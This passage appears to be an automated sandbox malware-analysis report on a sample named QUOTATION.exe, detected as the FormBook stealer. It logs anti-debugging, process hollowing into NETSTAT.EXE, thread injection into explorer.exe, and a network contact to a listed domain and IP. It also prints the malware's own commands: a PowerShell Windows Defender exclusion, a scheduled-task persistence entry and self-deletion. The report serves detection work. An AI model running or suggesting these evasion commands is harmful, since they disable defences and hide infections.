          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03318B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03315BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03258A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03263A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03318A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\QUOTATION.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.purelai.store
          Source: C:\Windows\explorer.exeNetwork Connect: 208.51.62.42 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1050000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\QUOTATION.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3352
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
          Source: explorer.exe, 00000013.00000000.299565234.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000013.00000000.336419113.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000013.00000000.323444529.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000013.00000000.344152528.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.309030845.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Users\user\Desktop\QUOTATION.exe VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
